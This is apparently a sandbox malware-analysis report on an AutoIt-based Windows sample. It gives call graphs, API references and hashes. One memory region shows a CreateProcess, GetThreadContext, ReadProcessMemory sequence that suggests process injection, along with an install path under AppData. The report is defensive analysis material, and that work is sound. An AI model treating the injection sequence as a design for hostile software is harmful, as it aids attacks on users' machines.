__write_nolock 85522->85542 85531 414ad8 __recalloc 85527->85531 85534 414af2 85527->85534 85528 414ae2 85594 417f77 46 API calls __getptd_noexit 85528->85594 85530 414ae7 85595 417f25 10 API calls __write_nolock 85530->85595 85531->85528 85531->85534 85538 414b2d 85531->85538 85543 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 85534->85543 85535 414c38 __recalloc 85597 417f77 46 API calls __getptd_noexit 85535->85597 85536 414139 __fseek_nolock 46 API calls 85536->85538 85538->85534 85538->85535 85538->85536 85544 41dfcc 85538->85544 85574 41d8f3 85538->85574 85596 41e0c2 46 API calls 3 library calls 85538->85596 85541->85522 85542->85518 85543->85518 85545 41dfd8 _fprintf 85544->85545 85546 41dfe0 85545->85546 85547 41dffb 85545->85547 85667 417f8a 46 API calls __getptd_noexit 85546->85667 85549 41e007 85547->85549 85552 41e041 85547->85552 85669 417f8a 46 API calls __getptd_noexit 85549->85669 85550 41dfe5 85668 417f77 46 API calls __getptd_noexit 85550->85668 85555 41e063 85552->85555 85556 41e04e 85552->85556 85554 41e00c 85670 417f77 46 API calls __getptd_noexit 85554->85670 85559 41ae56 ___lock_fhandle 48 API calls 85555->85559 85672 417f8a 46 API calls __getptd_noexit 85556->85672 85561 41e069 85559->85561 85560 41e053 85673 417f77 46 API calls __getptd_noexit 85560->85673 85564 41e077 85561->85564 85565 41e08b 85561->85565 85562 41e014 85671 417f25 10 API calls __write_nolock 85562->85671 85598 41da15 85564->85598 85674 417f77 46 API calls __getptd_noexit 85565->85674 85569 41dfed _fprintf 85569->85538 85570 41e083 85676 41e0ba LeaveCriticalSection __unlock_fhandle 85570->85676 85571 41e090 85675 417f8a 46 API calls __getptd_noexit 85571->85675 85575 41d900 85574->85575 85578 41d915 85574->85578 85680 417f77 46 API calls __getptd_noexit 85575->85680 85577 41d905 85681 417f25 10 API calls __write_nolock 85577->85681 85580 41d94a 85578->85580 85585 41d910 85578->85585 85677 420603 85578->85677 85582 414139 __fseek_nolock 46 API calls 85580->85582 
85583 41d95e 85582->85583 85584 41dfcc __read 59 API calls 85583->85584 85586 41d965 85584->85586 85585->85538 85586->85585 85587 414139 __fseek_nolock 46 API calls 85586->85587 85588 41d988 85587->85588 85588->85585 85589 414139 __fseek_nolock 46 API calls 85588->85589 85590 41d994 85589->85590 85590->85585 85591 414139 __fseek_nolock 46 API calls 85590->85591 85592 41d9a1 85591->85592 85593 414139 __fseek_nolock 46 API calls 85592->85593 85593->85585 85594->85530 85595->85534 85596->85538 85597->85530 85599 41da31 85598->85599 85600 41da4c 85598->85600 85602 417f8a __write_nolock 46 API calls 85599->85602 85601 41da5b 85600->85601 85603 41da7a 85600->85603 85604 417f8a __write_nolock 46 API calls 85601->85604 85605 41da36 85602->85605 85607 41da98 85603->85607 85618 41daac 85603->85618 85606 41da60 85604->85606 85608 417f77 __write_nolock 46 API calls 85605->85608 85609 417f77 __write_nolock 46 API calls 85606->85609 85610 417f8a __write_nolock 46 API calls 85607->85610 85619 41da3e 85608->85619 85612 41da67 85609->85612 85614 41da9d 85610->85614 85611 41db02 85613 417f8a __write_nolock 46 API calls 85611->85613 85615 417f25 __write_nolock 10 API calls 85612->85615 85616 41db07 85613->85616 85617 417f77 __write_nolock 46 API calls 85614->85617 85615->85619 85620 417f77 __write_nolock 46 API calls 85616->85620 85621 41daa4 85617->85621 85618->85611 85618->85619 85622 41dae1 85618->85622 85623 41db1b 85618->85623 85619->85570 85620->85621 85624 417f25 __write_nolock 10 API calls 85621->85624 85622->85611 85627 41daec ReadFile 85622->85627 85625 416b04 __malloc_crt 46 API calls 85623->85625 85624->85619 85628 41db31 85625->85628 85629 41dc17 85627->85629 85630 41df8f GetLastError 85627->85630 85633 41db59 85628->85633 85634 41db3b 85628->85634 85629->85630 85637 41dc2b 85629->85637 85631 41de16 85630->85631 85632 41df9c 85630->85632 85641 417f9d __dosmaperr 46 API calls 85631->85641 85647 41dd9b 85631->85647 85635 417f77 __write_nolock 46 API calls 85632->85635 
85638 420494 __lseeki64_nolock 48 API calls 85633->85638 85636 417f77 __write_nolock 46 API calls 85634->85636 85639 41dfa1 85635->85639 85640 41db40 85636->85640 85646 41de5b 85637->85646 85637->85647 85648 41dc47 85637->85648 85642 41db67 85638->85642 85643 417f8a __write_nolock 46 API calls 85639->85643 85644 417f8a __write_nolock 46 API calls 85640->85644 85641->85647 85642->85627 85643->85647 85644->85619 85645 413748 _free 46 API calls 85645->85619 85646->85647 85650 41ded0 ReadFile 85646->85650 85647->85619 85647->85645 85649 41dcab ReadFile 85648->85649 85656 41dd28 85648->85656 85652 41dcc9 GetLastError 85649->85652 85658 41dcd3 85649->85658 85653 41deef GetLastError 85650->85653 85654 41def9 85650->85654 85651 41ddec MultiByteToWideChar 85651->85647 85655 41de10 GetLastError 85651->85655 85652->85648 85652->85658 85653->85646 85653->85654 85654->85646 85662 420494 __lseeki64_nolock 48 API calls 85654->85662 85655->85631 85656->85647 85657 41dd96 85656->85657 85660 41dda3 85656->85660 85663 41dd60 85656->85663 85659 417f77 __write_nolock 46 API calls 85657->85659 85658->85648 85661 420494 __lseeki64_nolock 48 API calls 85658->85661 85659->85647 85660->85663 85664 41ddda 85660->85664 85661->85658 85662->85654 85663->85651 85665 420494 __lseeki64_nolock 48 API calls 85664->85665 85666 41dde9 85665->85666 85666->85651 85667->85550 85668->85569 85669->85554 85670->85562 85671->85569 85672->85560 85673->85562 85674->85571 85675->85570 85676->85569 85678 416b04 __malloc_crt 46 API calls 85677->85678 85679 420618 85678->85679 85679->85580 85680->85577 85681->85585 85685 4148b3 GetSystemTimeAsFileTime __aulldiv 85682->85685 85684 442c6b 85684->85191 85685->85684 85686->85198 85687->85204 85688->85204 85694 45272f __tzset_nolock _wcscpy 85689->85694 85690 414d04 61 API calls __fread_nolock 85690->85694 85691 44afef GetSystemTimeAsFileTime 85691->85694 85692 4528a4 85692->85113 85692->85114 85693 4150d1 81 API calls _fseek 85693->85694 85694->85690 85694->85691 
85694->85692 85694->85693 85696 44b1bc 85695->85696 85697 44b1ca 85695->85697 85698 4149c2 116 API calls 85696->85698 85699 44b1e1 85697->85699 85700 44b1d8 85697->85700 85701 4149c2 116 API calls 85697->85701 85698->85697 85730 4321a4 85699->85730 85700->85140 85703 44b2db 85701->85703 85703->85699 85705 44b2e9 85703->85705 85704 44b224 85706 44b253 85704->85706 85707 44b228 85704->85707 85708 44b2f6 85705->85708 85710 414a46 __fcloseall 82 API calls 85705->85710 85734 43213d 85706->85734 85709 44b235 85707->85709 85713 414a46 __fcloseall 82 API calls 85707->85713 85708->85140 85714 44b245 85709->85714 85717 414a46 __fcloseall 82 API calls 85709->85717 85710->85708 85712 44b25a 85715 44b260 85712->85715 85716 44b289 85712->85716 85713->85709 85714->85140 85719 414a46 __fcloseall 82 API calls 85715->85719 85721 44b26d 85715->85721 85744 44b0bf 87 API calls 85716->85744 85717->85714 85719->85721 85720 44b28f 85745 4320f8 46 API calls _free 85720->85745 85722 414a46 __fcloseall 82 API calls 85721->85722 85724 44b27d 85721->85724 85722->85724 85724->85140 85725 44b295 85726 44b2a2 85725->85726 85727 414a46 __fcloseall 82 API calls 85725->85727 85728 44b2b2 85726->85728 85729 414a46 __fcloseall 82 API calls 85726->85729 85727->85726 85728->85140 85729->85728 85731 4321cb 85730->85731 85733 4321b4 __tzset_nolock _memmove 85730->85733 85732 414d04 __fread_nolock 61 API calls 85731->85732 85732->85733 85733->85704 85735 4135bb _malloc 46 API calls 85734->85735 85736 432150 85735->85736 85737 4135bb _malloc 46 API calls 85736->85737 85738 432162 85737->85738 85739 4135bb _malloc 46 API calls 85738->85739 85740 432174 85739->85740 85742 432189 85740->85742 85746 4320f8 46 API calls _free 85740->85746 85742->85712 85743 432198 85743->85712 85744->85720 85745->85725 85746->85743 85747->85043 85748->85045 85749->85063 85750->85063 85751->85063 85752->85058 85753->85063 85754->85063 85755->85069 85756->85077 85757->85079 85758->85079 85808 410160 85759->85808 85761 41012f 
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1762048999-758534266
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04C0F6E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04C0F90F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 204039940-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 04C0F2A8: Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04C0F4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: QCTMDQBDDWA12LNO5EWW
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2694422964-2706631413
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 04C0EA63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04C0EAF9
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04C0EB1B
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 04C0EE24
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 572931308-0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\directory\name.exe, xrefs: 00410107
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strcat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\directory\name.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1765576173-3037739059
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 680241177-0

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04C0F392
Strings
Memory Dump Source
• Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
Similarity
• API ID: CreateProcess
• String ID: D
• API String ID: 963392458-2746444292
• Opcode ID: 4f78463fcc51ba8bfe754f1ec18d49dab538cbca16649063d724483151500864
• Instruction ID: a553608dcef72a712f55ffbbbb1ce2d429d0b2f38d9c0713f56535d576000a2b
• Opcode Fuzzy Hash: 4f78463fcc51ba8bfe754f1ec18d49dab538cbca16649063d724483151500864
• Instruction Fuzzy Hash: B501E871A40308AADB30DFE1CC49FEE7779AB44701F408509AA159A180EAB4A6489B65

APIs
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
• CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
Memory Dump Source
• Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_name.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
• Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
• Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
• Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C

Memory Dump Source
• Source File: 00000001.00000002.1803702592.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1803687522.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803757173.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803779352.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803862064.0000000000491000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.0000000000492000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803898756.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1803971158.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_name.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
• Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
• Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04C0D8F3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 04C0D8C3
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 04C0F2B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1808845006.0000000004C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 04C0D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_4c0d000_name.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
